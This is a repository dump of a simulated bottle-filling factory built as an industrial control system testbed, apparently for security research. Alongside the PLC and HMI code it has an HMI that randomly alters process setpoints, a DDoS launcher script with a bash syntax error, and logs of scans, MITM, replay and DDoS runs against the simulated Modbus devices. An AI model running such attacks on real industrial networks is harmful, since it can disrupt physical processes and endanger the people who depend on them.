44 | bottle_water_amount += self._get(TAG.TAG_TANK_OUTPUT_FLOW_VALUE) * elapsed_time
45 |
46 | bottle_water_level = bottle_water_amount / PHYSICS.BOTTLE_LEVEL_CAPACITY
47 |
48 | if bottle_water_level > PHYSICS.BOTTLE_MAX_LEVEL:
49 | bottle_water_level = PHYSICS.BOTTLE_MAX_LEVEL
50 | self.report('bottle water overflowed', logging.WARNING)
51 |
52 | # update bottle position
53 | bottle_distance_to_filler = self._get(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE)
54 | if self._get(TAG.TAG_CONVEYOR_BELT_ENGINE_STATUS):
55 | bottle_distance_to_filler -= elapsed_time * PHYSICS.CONVEYOR_BELT_SPEED
56 | bottle_distance_to_filler %= PHYSICS.BOTTLE_DISTANCE
57 |
58 | # update physical properties
59 | self._set(TAG.TAG_TANK_LEVEL_VALUE, tank_water_level)
60 | self._set(TAG.TAG_TANK_OUTPUT_FLOW_VALUE, tank_water_flow)
61 | self._set(TAG.TAG_BOTTLE_LEVEL_VALUE, bottle_water_level)
62 | self._set(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE, bottle_distance_to_filler)
63 |
64 | def init(self):
65 | initial_list = []
66 | for tag in TAG.TAG_LIST:
67 | initial_list.append((tag, TAG.TAG_LIST[tag]['default']))
68 |
69 | self._connector.initialize(initial_list)
70 |
71 |
72 | @staticmethod
73 | def recreate_connection():
74 | return True
75 |
76 |
77 | if __name__ == '__main__':
78 | factory = FactorySimulation()
79 | factory.start()
80 |
--------------------------------------------------------------------------------
/bottlefactory/src/HMI1.py:
--------------------------------------------------------------------------------
1 | import logging
2 | from datetime import datetime
3 |
4 | from ics_sim.Device import HMI
5 | from Configs import TAG, Controllers
6 |
7 |
8 | class HMI1(HMI):
9 | def __init__(self):
10 | super().__init__('HMI1', TAG.TAG_LIST, Controllers.PLCs, 500)
11 |
12 | self._rows = {}
13 | self.title_length = 27
14 | self.msg1_length = 21
15 | self.msg2_length = 10
16 | self._border = '-' * (self.title_length + self.msg1_length + self.msg2_length + 4)
17 |
18 | self._border_top = \
19 | "┌" + "─" * self.title_length + "┬" + "─" * self.msg1_length + "┬" + "─" * self.msg2_length + "┐"
20 | self._border_mid = \
21 | "├" + "─" * self.title_length + "┼" + "─" * self.msg1_length + "┼" + "─" * self.msg2_length + "┤"
22 | self._border_bot = \
23 | "└" + "─" * self.title_length + "┴" + "─" * self.msg1_length + "┴" + "─" * self.msg2_length + "┘"
24 |
25 | self.cellVerticalLine = "│"
26 |
27 | for tag in self.tags:
28 | pos = tag.rfind('_')
29 | tag_name = tag[0:pos]
30 | if not self._rows.keys().__contains__(tag_name):
31 | self._rows[tag_name] = {'tag': tag_name.center(self.title_length, ' '), 'msg1': '', 'msg2': ''}
32 |
33 | self._latency = 0
34 |
35 | def _display(self):
36 |
37 | self.__show_table()
38 |
39 | def _operate(self):
40 | self.__update_massages()
41 |
42 | def __update_massages(self):
43 | self._latency = 0
44 |
45 | for row in self._rows:
46 | self._rows[row]['msg1'] = ''
47 | self._rows[row]['msg2'] = ''
48 |
49 | for tag in self.tags:
50 | pos = tag.rfind('_')
51 | row = tag[0:pos]
52 | attribute = tag[pos + 1:]
53 |
54 | if attribute == 'value' or attribute == 'status':
55 | self._rows[row]['msg2'] += self.__get_formatted_value(tag)
56 | elif attribute == 'max':
57 | self._rows[row]['msg1'] += self.__get_formatted_value(tag)
58 | self._rows[row]['msg1'] = self._make_text(self._rows[row]['msg1'].center(self.msg1_length, " "), self.COLOR_GREEN)
59 | else:
60 | self._rows[row]['msg1'] += self.__get_formatted_value(tag)
61 |
62 | for row in self._rows:
63 | if self._rows[row]['msg1'] == '':
64 | self._rows[row]['msg1'] = ''.center(self.msg1_length, ' ')
65 | if self._rows[row]['msg2'] == '':
66 | self._rows[row]['msg2'] = ''.center(self.msg1_length, ' ')
67 |
68 | def __get_formatted_value(self, tag):
69 | timestamp = datetime.now()
70 | pos = tag.rfind('_')
71 | tag_name = tag[0:pos]
72 | tag_attribute = tag[pos + 1:]
73 |
74 | try:
75 | value = self._receive(tag)
76 | except Exception as e:
77 | self.report(e.__str__(), logging.WARNING)
78 | value = 'NULL'
79 |
80 | if tag_attribute == 'mode':
81 | if value == 1:
82 | value = self._make_text('Off manually'.center(self.msg1_length, " "), self.COLOR_YELLOW)
83 | elif value == 2:
84 | value = self._make_text('On manually'.center(self.msg1_length, " "), self.COLOR_YELLOW)
85 | elif value == 3:
86 | value = self._make_text('Auto'.center(self.msg1_length, " "), self.COLOR_GREEN)
87 | else:
88 |
89 | value = self._make_text(str(value).center(self.msg1_length, " "), self.COLOR_RED)
90 |
91 | elif tag_attribute == 'status' or self.tags[tag]['id'] == 7:
92 | if value == 'NULL':
93 | value = self._make_text(value.center(self.msg2_length, " "), self.COLOR_RED)
94 | elif value:
95 | value = self._make_text('>>>'.center(self.msg2_length, " "), self.COLOR_BLUE)
96 | else:
97 | value = self._make_text('X'.center(self.msg2_length, " "), self.COLOR_RED)
98 |
99 | elif tag_attribute == 'min':
100 | value = 'Min:' + str(value) + ' '
101 |
102 | elif tag_attribute == 'max':
103 | value = 'Max:' + str(value)
104 |
105 | elif value == 'NULL':
106 | value = self._make_text(value.center(self.msg2_length, " "), self.COLOR_RED)
107 | else:
108 | value = self._make_text(str(value).center(self.msg2_length, " "), self.COLOR_CYAN)
109 |
110 | elapsed = datetime.now() - timestamp
111 |
112 | if elapsed.microseconds > self._latency:
113 | self._latency = elapsed.microseconds
114 | return value
115 |
116 | def __show_table(self):
117 | result = " (Latency {}ms)\n".format(self._latency / 1000)
118 |
119 | first = True
120 | for row in self._rows:
121 | if first:
122 | result += self._border_top + "\n"
123 | first = False
124 | else:
125 | result += self._border_mid + "\n"
126 |
127 | result += '│{}│{}│{}│\n'.format(self._rows[row]['tag'], self._rows[row]['msg1'], self._rows[row]['msg2'])
128 |
129 | result += self._border_bot + "\n"
130 |
131 | self.report(result)
132 |
133 |
134 | if __name__ == '__main__':
135 | hmi1 = HMI1()
136 | hmi1.start()
137 |
--------------------------------------------------------------------------------
/bottlefactory/src/HMI2.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import sys
4 |
5 | from ics_sim.Device import HMI
6 | from Configs import TAG, Controllers
7 |
8 |
9 | class HMI2(HMI):
10 | def __init__(self):
11 | super().__init__('HMI2', TAG.TAG_LIST, Controllers.PLCs)
12 |
13 | def _display(self):
14 | menu_line = '{}) To change the {} press {} \n'
15 |
16 | menu = '\n'
17 |
18 | menu += self.__get_menu_line(1, 'empty level of tank')
19 | menu += self.__get_menu_line(2, 'full level of tank')
20 | menu += self.__get_menu_line(3, 'full level of bottle')
21 | menu += self.__get_menu_line(4, 'status of tank Input valve')
22 | menu += self.__get_menu_line(5, 'status of tank output valve')
23 | menu += self.__get_menu_line(6, 'status of conveyor belt engine')
24 | self.report(menu)
25 |
26 | def __get_menu_line(self, number, text):
27 | return '{} To change the {} press {} \n'.format(
28 | self._make_text(str(number)+')', self.COLOR_BLUE),
29 | self._make_text(text, self.COLOR_GREEN),
30 | self._make_text(str(number), self.COLOR_BLUE)
31 | )
32 |
33 | def _operate(self):
34 | try:
35 | choice = self.__get_choice()
36 | input1, input2 = choice
37 | if input1 == 1:
38 | self._send(TAG.TAG_TANK_LEVEL_MIN, input2)
39 |
40 | elif input1 == 2:
41 | self._send(TAG.TAG_TANK_LEVEL_MAX, input2)
42 |
43 | elif input1 == 3:
44 | self._send(TAG.TAG_BOTTLE_LEVEL_MAX, input2)
45 |
46 | elif input1 == 4:
47 | self._send(TAG.TAG_TANK_INPUT_VALVE_MODE, input2)
48 |
49 | elif input1 == 5:
50 | self._send(TAG.TAG_TANK_OUTPUT_VALVE_MODE, input2)
51 |
52 | elif input1 == 6:
53 | self._send(TAG.TAG_CONVEYOR_BELT_ENGINE_MODE, input2)
54 |
55 | except ValueError as e:
56 | self.report(e.__str__())
57 | except Exception as e:
58 | self.report('The input is invalid' + e.__str__())
59 |
60 | input('press inter to continue ...')
61 |
62 | def __get_choice(self):
63 | input1 = int(input('your choice (1 to 6): '))
64 | if input1 < 1 or input1 > 6:
65 | raise ValueError('just integer values between 1 and 6 are acceptable')
66 |
67 | if input1 <= 3:
68 | input2 = float(input('Specify set point (positive real value): '))
69 | if input2 < 0:
70 | raise ValueError('Negative numbers are not acceptable.')
71 | else:
72 | sub_menu = '\n'
73 | sub_menu += "1) Send command for manually off\n"
74 | sub_menu += "2) Send command for manually on\n"
75 | sub_menu += "3) Send command for auto operation\n"
76 | self.report(sub_menu)
77 | input2 = int(input('Command (1 to 3): '))
78 | if input2 < 1 or input2 > 3:
79 | raise ValueError('Just 1, 2, and 3 are acceptable for command')
80 |
81 | return input1, input2
82 |
83 |
84 | if __name__ == '__main__':
85 | hmi2 = HMI2()
86 | hmi2.start()
--------------------------------------------------------------------------------
/bottlefactory/src/HMI3.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import sys
4 | import time
5 | import random
6 |
7 | from ics_sim.Device import HMI
8 | from Configs import TAG, Controllers
9 |
10 |
11 | class HMI3(HMI):
12 | def __init__(self):
13 | super().__init__('HMI3', TAG.TAG_LIST, Controllers.PLCs)
14 |
15 |
16 | def _before_start(self):
17 | HMI._before_start(self)
18 |
19 | while True:
20 | response = input("Do you want to start auto manipulation of factory setting? \n")
21 | response = response.lower()
22 | if response == 'y' or response == 'yes':
23 | self._set_clear_scr(False)
24 | self.random_values = [["TANK LEVEL MIN" , 1 , 4.5] ,["TANK LEVEL MAX" , 5.5 , 9],["BOTTLE LEVEL MAX" , 1 , 1.9]]
25 | break
26 | else:
27 | continue
28 |
29 | def _display(self):
30 | n = random.randint(5, 20)
31 | print("Sleep for {} seconds \n".format(n))
32 | time.sleep(n)
33 |
34 |
35 | def _operate(self):
36 | try:
37 | choice = self.__get_choice()
38 | input1, input2 = choice
39 | if input1 == 1:
40 | self._send(TAG.TAG_TANK_LEVEL_MIN, input2)
41 |
42 | elif input1 == 2:
43 | self._send(TAG.TAG_TANK_LEVEL_MAX, input2)
44 |
45 | elif input1 == 3:
46 | self._send(TAG.TAG_BOTTLE_LEVEL_MAX, input2)
47 |
48 | except ValueError as e:
49 | self.report(e.__str__())
50 | except Exception as e:
51 | self.report('The input is invalid' + e.__str__())
52 |
53 | print('set {} to the {} automatically'.format(self.random_values[input1-1][0], input2))
54 |
55 | def __get_choice(self):
56 | input1 = random.randint(1, len(self.random_values))
57 | print(self.random_values)
58 | print(input1)
59 | input2 = random.uniform(self.random_values[input1-1][1] , self.random_values[input1-1][2])
60 | print (input2)
61 | return input1, input2
62 |
63 |
64 |
65 | if __name__ == '__main__':
66 | hmi3= HMI3()
67 | hmi3.start()
--------------------------------------------------------------------------------
/bottlefactory/src/PLC1.py:
--------------------------------------------------------------------------------
1 | from ics_sim.Device import PLC, SensorConnector, ActuatorConnector
2 | from Configs import TAG, Controllers, Connection
3 | import logging
4 |
5 |
6 | class PLC1(PLC):
7 | def __init__(self):
8 | sensor_connector = SensorConnector(Connection.CONNECTION)
9 | actuator_connector = ActuatorConnector(Connection.CONNECTION)
10 | super().__init__(1, sensor_connector, actuator_connector, TAG.TAG_LIST, Controllers.PLCs)
11 |
12 | def _logic(self):
13 | # update TAG.TAG_TANK_INPUT_VALVE_STATUS
14 |
15 | if not self._check_manual_input(TAG.TAG_TANK_INPUT_VALVE_MODE, TAG.TAG_TANK_INPUT_VALVE_STATUS):
16 | tank_level = self._get(TAG.TAG_TANK_LEVEL_VALUE)
17 | if tank_level > self._get(TAG.TAG_TANK_LEVEL_MAX):
18 | self._set(TAG.TAG_TANK_INPUT_VALVE_STATUS, 0)
19 | elif tank_level < self._get(TAG.TAG_TANK_LEVEL_MIN):
20 | self._set(TAG.TAG_TANK_INPUT_VALVE_STATUS, 1)
21 |
22 | # update TAG.TAG_TANK_OUTPUT_VALVE_STATUS
23 | if not self._check_manual_input(TAG.TAG_TANK_OUTPUT_VALVE_MODE, TAG.TAG_TANK_OUTPUT_VALVE_STATUS):
24 | bottle_level = self._get(TAG.TAG_BOTTLE_LEVEL_VALUE)
25 | belt_position = self._get(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE)
26 | if bottle_level > self._get(TAG.TAG_BOTTLE_LEVEL_MAX) or belt_position > 1.0:
27 | self._set(TAG.TAG_TANK_OUTPUT_VALVE_STATUS, 0)
28 | else:
29 | self._set(TAG.TAG_TANK_OUTPUT_VALVE_STATUS, 1)
30 |
31 | def _post_logic_update(self):
32 | super()._post_logic_update()
33 | #self.report("{} {}".format( self.get_alive_time() / 1000, self.get_loop_latency() / 1000), logging.INFO)
34 |
35 |
36 | if __name__ == '__main__':
37 | plc1 = PLC1()
38 | plc1.set_record_variables(True)
39 | plc1.start()
40 |
--------------------------------------------------------------------------------
/bottlefactory/src/PLC2.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import time
3 |
4 | from ics_sim.Device import PLC, SensorConnector, ActuatorConnector
5 | from Configs import TAG, Connection, Controllers
6 |
7 |
8 | class PLC2(PLC):
9 | def __init__(self):
10 | sensor_connector = SensorConnector(Connection.CONNECTION)
11 | actuator_connector = ActuatorConnector(Connection.CONNECTION)
12 | super().__init__(2, sensor_connector, actuator_connector, TAG.TAG_LIST, Controllers.PLCs)
13 |
14 | def _logic(self):
15 | if not self._check_manual_input(TAG.TAG_CONVEYOR_BELT_ENGINE_MODE, TAG.TAG_CONVEYOR_BELT_ENGINE_STATUS):
16 | t1 = time.time()
17 | flow = self._get(TAG.TAG_TANK_OUTPUT_FLOW_VALUE)
18 |
19 | belt_position = self._get(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE)
20 | bottle_level = self._get(TAG.TAG_BOTTLE_LEVEL_VALUE)
21 |
22 | if (belt_position > 1) or (flow == 0 and bottle_level > self._get(TAG.TAG_BOTTLE_LEVEL_MAX)):
23 | self._set(TAG.TAG_CONVEYOR_BELT_ENGINE_STATUS, 1)
24 | else:
25 | self._set(TAG.TAG_CONVEYOR_BELT_ENGINE_STATUS, 0)
26 |
27 |
28 | if __name__ == '__main__':
29 | plc2 = PLC2()
30 | plc2.set_record_variables(True)
31 | plc2.start()
32 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/9.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | sudo ls
5 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/attack-logs/attacker_machine_summary.csv:
--------------------------------------------------------------------------------
1 | attack,startStamp,endStamp,startTime,endTime,attackerMAC,attackerIP,description
2 | ddos,1663682079.730767,1663682383.768882,2022-09-20 15:54:39.730767,2022-09-20 15:59:43.768882,02:42:c0:a8:00:29,192.168.0.41,ddos
3 | ip-scan,1663682423.853559,1663682428.697727,2022-09-20 16:00:23.853559,2022-09-20 16:00:28.697727,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
4 | replay,1663682468.741003,1663682535.516444,2022-09-20 16:01:08.741003,2022-09-20 16:02:15.516444,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
5 | mitm,1663682575.556887,1663682612.314834,2022-09-20 16:02:55.556887,2022-09-20 16:03:32.314834,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
6 | port-scan,1663682652.357352,1663682664.961336,2022-09-20 16:04:12.357352,2022-09-20 16:04:24.961336,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
7 | mitm,1663682705.009439,1663682741.633819,2022-09-20 16:05:05.009439,2022-09-20 16:05:41.633819,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
8 | port-scan,1663682781.645353,1663682794.380077,2022-09-20 16:06:21.645353,2022-09-20 16:06:34.380077,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
9 | port-scan,1663682834.421368,1663682846.385509,2022-09-20 16:07:14.421368,2022-09-20 16:07:26.385509,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
10 | ip-scan,1663682886.428848,1663682890.042186,2022-09-20 16:08:06.428848,2022-09-20 16:08:10.042186,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
11 | port-scan,1663682930.082188,1663682944.284971,2022-09-20 16:08:50.082188,2022-09-20 16:09:04.284971,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
12 | ip-scan,1663682984.326633,1663682988.305043,2022-09-20 16:09:44.326633,2022-09-20 16:09:48.305043,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
13 | port-scan,1663683028.345857,1663683041.960416,2022-09-20 16:10:28.345857,2022-09-20 16:10:41.960416,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
14 | ip-scan,1663683082.003998,1663683085.786715,2022-09-20 16:11:22.003998,2022-09-20 16:11:25.786715,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
15 | ip-scan,1663683125.826981,1663683129.683181,2022-09-20 16:12:05.826981,2022-09-20 16:12:09.683181,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
16 | ip-scan,1663683169.709712,1663683173.615377,2022-09-20 16:12:49.709712,2022-09-20 16:12:53.615377,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
17 | ddos,1663683218.656172,1663683284.033203,2022-09-20 16:13:38.656172,2022-09-20 16:14:44.033203,02:42:c0:a8:00:29,192.168.0.41,ddos
18 | port-scan,1663683324.077348,1663683339.196166,2022-09-20 16:15:24.077348,2022-09-20 16:15:39.196166,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
19 | ip-scan,1663683379.237152,1663683383.175534,2022-09-20 16:16:19.237152,2022-09-20 16:16:23.175534,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
20 | mitm,1663683423.218022,1663683460.256863,2022-09-20 16:17:03.218022,2022-09-20 16:17:40.256863,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
21 | ip-scan,1663683500.29838,1663683505.133496,2022-09-20 16:18:20.298380,2022-09-20 16:18:25.133496,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
22 | ddos,1663683550.159403,1663683610.99125,2022-09-20 16:19:10.159403,2022-09-20 16:20:10.991250,02:42:c0:a8:00:29,192.168.0.41,ddos
23 | mitm,1663683651.033033,1663683686.902644,2022-09-20 16:20:51.033033,2022-09-20 16:21:26.902644,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
24 | mitm,1663683726.936851,1663683763.736726,2022-09-20 16:22:06.936851,2022-09-20 16:22:43.736726,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
25 | ddos,1663683808.781532,1663683871.195,2022-09-20 16:23:28.781532,2022-09-20 16:24:31.195000,02:42:c0:a8:00:29,192.168.0.41,ddos
26 | ip-scan,1663683911.237765,1663683914.913962,2022-09-20 16:25:11.237765,2022-09-20 16:25:14.913962,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
27 | mitm,1663683954.957202,1663683991.950824,2022-09-20 16:25:54.957202,2022-09-20 16:26:31.950824,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
28 | ddos,1663684036.980584,1663684095.695907,2022-09-20 16:27:16.980584,2022-09-20 16:28:15.695907,02:42:c0:a8:00:29,192.168.0.41,ddos
29 | ip-scan,1663684135.744012,1663684139.319657,2022-09-20 16:28:55.744012,2022-09-20 16:28:59.319657,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
30 | replay,1663684179.340916,1663684244.785401,2022-09-20 16:29:39.340916,2022-09-20 16:30:44.785401,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
31 | mitm,1663684284.825418,1663684321.36504,2022-09-20 16:31:24.825418,2022-09-20 16:32:01.365040,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
32 | port-scan,1663684361.409163,1663684373.852429,2022-09-20 16:32:41.409163,2022-09-20 16:32:53.852429,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
33 | port-scan,1663684413.870493,1663684429.636184,2022-09-20 16:33:33.870493,2022-09-20 16:33:49.636184,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
34 | mitm,1663684469.641617,1663684506.412982,2022-09-20 16:34:29.641617,2022-09-20 16:35:06.412982,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
35 | mitm,1663684546.45543,1663684583.261452,2022-09-20 16:35:46.455430,2022-09-20 16:36:23.261452,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
36 | ip-scan,1663684623.307187,1663684627.300265,2022-09-20 16:37:03.307187,2022-09-20 16:37:07.300265,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
37 | ip-scan,1663684667.309589,1663684670.895525,2022-09-20 16:37:47.309589,2022-09-20 16:37:50.895525,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
38 | mitm,1663684710.938869,1663684747.57525,2022-09-20 16:38:30.938869,2022-09-20 16:39:07.575250,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
39 | replay,1663684787.613847,1663684854.059885,2022-09-20 16:39:47.613847,2022-09-20 16:40:54.059885,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
40 | port-scan,1663684894.08896,1663684907.986178,2022-09-20 16:41:34.088960,2022-09-20 16:41:47.986178,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
41 | port-scan,1663684948.025416,1663684962.905167,2022-09-20 16:42:28.025416,2022-09-20 16:42:42.905167,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
42 | ip-scan,1663685002.926912,1663685006.666371,2022-09-20 16:43:22.926912,2022-09-20 16:43:26.666371,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
43 | ddos,1663685051.701754,1663685110.670506,2022-09-20 16:44:11.701754,2022-09-20 16:45:10.670506,02:42:c0:a8:00:29,192.168.0.41,ddos
44 | ip-scan,1663685150.678591,1663685154.483437,2022-09-20 16:45:50.678591,2022-09-20 16:45:54.483437,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
45 | ip-scan,1663685194.525956,1663685198.4616,2022-09-20 16:46:34.525956,2022-09-20 16:46:38.461600,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
46 | ip-scan,1663685238.501989,1663685242.345949,2022-09-20 16:47:18.501989,2022-09-20 16:47:22.345949,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
47 | ip-scan,1663685282.387516,1663685286.541805,2022-09-20 16:48:02.387516,2022-09-20 16:48:06.541805,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
48 | replay,1663685326.583491,1663685393.346662,2022-09-20 16:48:46.583491,2022-09-20 16:49:53.346662,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
49 | replay,1663685433.388974,1663685499.908914,2022-09-20 16:50:33.388974,2022-09-20 16:51:39.908914,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
50 | port-scan,1663685539.949868,1663685556.114163,2022-09-20 16:52:19.949868,2022-09-20 16:52:36.114163,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
51 | mitm,1663685596.139047,1663685632.871519,2022-09-20 16:53:16.139047,2022-09-20 16:53:52.871519,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
52 | mitm,1663685672.894973,1663685709.881017,2022-09-20 16:54:32.894973,2022-09-20 16:55:09.881017,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
53 | ip-scan,1663685749.924495,1663685753.744528,2022-09-20 16:55:49.924495,2022-09-20 16:55:53.744528,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
54 | replay,1663685793.787033,1663685860.725437,2022-09-20 16:56:33.787033,2022-09-20 16:57:40.725437,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
55 | ip-scan,1663685900.769565,1663685904.71847,2022-09-20 16:58:20.769565,2022-09-20 16:58:24.718470,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
56 | port-scan,1663685944.760521,1663685960.757937,2022-09-20 16:59:04.760521,2022-09-20 16:59:20.757937,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
57 | ip-scan,1663686000.787798,1663686004.470038,2022-09-20 17:00:00.787798,2022-09-20 17:00:04.470038,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
58 | ddos,1663686049.517334,1663686108.149237,2022-09-20 17:00:49.517334,2022-09-20 17:01:48.149237,02:42:c0:a8:00:29,192.168.0.41,ddos
59 | ip-scan,1663686148.178409,1663686152.175079,2022-09-20 17:02:28.178409,2022-09-20 17:02:32.175079,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
60 | port-scan,1663686192.21746,1663686206.772917,2022-09-20 17:03:12.217460,2022-09-20 17:03:26.772917,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
61 | replay,1663686246.816962,1663686313.451679,2022-09-20 17:04:06.816962,2022-09-20 17:05:13.451679,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
62 | mitm,1663686353.476888,1663686390.088303,2022-09-20 17:05:53.476888,2022-09-20 17:06:30.088303,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
63 | port-scan,1663686430.125576,1663686444.983339,2022-09-20 17:07:10.125576,2022-09-20 17:07:24.983339,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
64 | mitm,1663686485.028528,1663686521.226361,2022-09-20 17:08:05.028528,2022-09-20 17:08:41.226361,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
65 | port-scan,1663686561.263111,1663686575.295529,2022-09-20 17:09:21.263111,2022-09-20 17:09:35.295529,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
66 | port-scan,1663686615.309533,1663686629.580709,2022-09-20 17:10:15.309533,2022-09-20 17:10:29.580709,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
67 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/attack-logs/attacker_summary.csv:
--------------------------------------------------------------------------------
1 | attack,startStamp,endStamp,startTime,endTime,attackerMAC,attackerIP,description
2 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/attack-logs/log-scan-nmap.txt:
--------------------------------------------------------------------------------
1 | # Nmap 7.92 scan initiated Tue Sep 20 17:10:15 2022 as: nmap -p- -oN ./attacks/attack-logs/log-scan-nmap.txt 192.168.0.1-255
2 | Nmap scan report for alireza-virtual-machine (192.168.0.1)
3 | Host is up (0.000013s latency).
4 | All 65535 scanned ports on alireza-virtual-machine (192.168.0.1) are in ignored states.
5 | Not shown: 65535 closed tcp ports (reset)
6 | MAC Address: 02:42:74:84:89:5E (Unknown)
7 |
8 | Nmap scan report for plc1.icsnet (192.168.0.11)
9 | Host is up (0.000026s latency).
10 | Not shown: 65534 closed tcp ports (reset)
11 | PORT STATE SERVICE
12 | 502/tcp open mbap
13 | MAC Address: 02:42:C0:A8:00:0B (Unknown)
14 |
15 | Nmap scan report for plc2.icsnet (192.168.0.12)
16 | Host is up (0.000026s latency).
17 | Not shown: 65534 closed tcp ports (reset)
18 | PORT STATE SERVICE
19 | 502/tcp open mbap
20 | MAC Address: 02:42:C0:A8:00:0C (Unknown)
21 |
22 | Nmap scan report for hmi1.icsnet (192.168.0.21)
23 | Host is up (0.000019s latency).
24 | All 65535 scanned ports on hmi1.icsnet (192.168.0.21) are in ignored states.
25 | Not shown: 65535 closed tcp ports (reset)
26 | MAC Address: 02:42:C0:A8:00:15 (Unknown)
27 |
28 | Nmap scan report for hmi2.icsnet (192.168.0.22)
29 | Host is up (0.000011s latency).
30 | All 65535 scanned ports on hmi2.icsnet (192.168.0.22) are in ignored states.
31 | Not shown: 65535 closed tcp ports (reset)
32 | MAC Address: 02:42:C0:A8:00:16 (Unknown)
33 |
34 | Nmap scan report for hmi3.icsnet (192.168.0.23)
35 | Host is up (0.000011s latency).
36 | All 65535 scanned ports on hmi3.icsnet (192.168.0.23) are in ignored states.
37 | Not shown: 65535 closed tcp ports (reset)
38 | MAC Address: 02:42:C0:A8:00:17 (Unknown)
39 |
40 | Nmap scan report for attacker.icsnet (192.168.0.42)
41 | Host is up (0.000011s latency).
42 | All 65535 scanned ports on attacker.icsnet (192.168.0.42) are in ignored states.
43 | Not shown: 65535 closed tcp ports (reset)
44 | MAC Address: 02:42:C0:A8:00:2A (Unknown)
45 |
46 | Nmap scan report for 6b609fb979b2 (192.168.0.41)
47 | Host is up (0.0000060s latency).
48 | All 65535 scanned ports on 6b609fb979b2 (192.168.0.41) are in ignored states.
49 | Not shown: 65535 closed tcp ports (reset)
50 |
51 | # Nmap done at Tue Sep 20 17:10:29 2022 -- 255 IP addresses (8 hosts up) scanned in 14.21 seconds
52 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/attack-logs/log-scan-scapy.txt:
--------------------------------------------------------------------------------
1 | # Found 7 in the network 192.168.0.1/24:
2 | IP:192.168.0.1 MAC:02:42:74:84:89:5e
3 | IP:192.168.0.11 MAC:02:42:c0:a8:00:0b
4 | IP:192.168.0.12 MAC:02:42:c0:a8:00:0c
5 | IP:192.168.0.21 MAC:02:42:c0:a8:00:15
6 | IP:192.168.0.22 MAC:02:42:c0:a8:00:16
7 | IP:192.168.0.23 MAC:02:42:c0:a8:00:17
8 | IP:192.168.0.42 MAC:02:42:c0:a8:00:2a
9 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/ddos.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | log-dir = $1
3 | log-file = $2
4 | sudo chmod 777 $1
5 | echo "">$2
6 | python3 DDosAgent.py 'A' &
7 | python3 DDosAgent.py 'B' &
8 | python3 DDosAgent.py 'C' &
9 | python3 DDosAgent.py 'D' &
10 | #python3 DDosAgent.py 'E' &
11 | #python3 DDosAgent.py 'F' &
12 | #python3 DDosAgent.py 'G' &
13 | #python3 DDosAgent.py 'H' &
14 | #python3 DDosAgent.py 'I' &
15 | python3 DDosAgent.py 'J'
16 |
17 | sudo chmod 777 $2
18 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm-ettercap.sh:
